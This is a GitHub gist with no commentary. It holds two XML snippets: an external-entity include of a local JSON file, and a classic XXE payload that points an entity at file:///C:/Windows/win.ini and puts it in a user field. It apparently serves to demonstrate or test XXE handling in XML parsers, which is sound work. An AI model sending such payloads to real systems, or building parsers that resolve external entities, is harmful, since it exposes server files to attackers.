Skip to content

Instantly share code, notes, and snippets.

@tomkerkhove
Last active July 17, 2023 15:35
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tomkerkhove/81b66893518fe51093aa980a05894e44 to your computer and use it in GitHub Desktop.
Save tomkerkhove/81b66893518fe51093aa980a05894e44 to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE order [
<!ENTITY myExternalEntity SYSTEM "expressions.json">
]>
<order>&myExternalEntity;</order>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<data>
<user>&xxe;</user>
</data>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment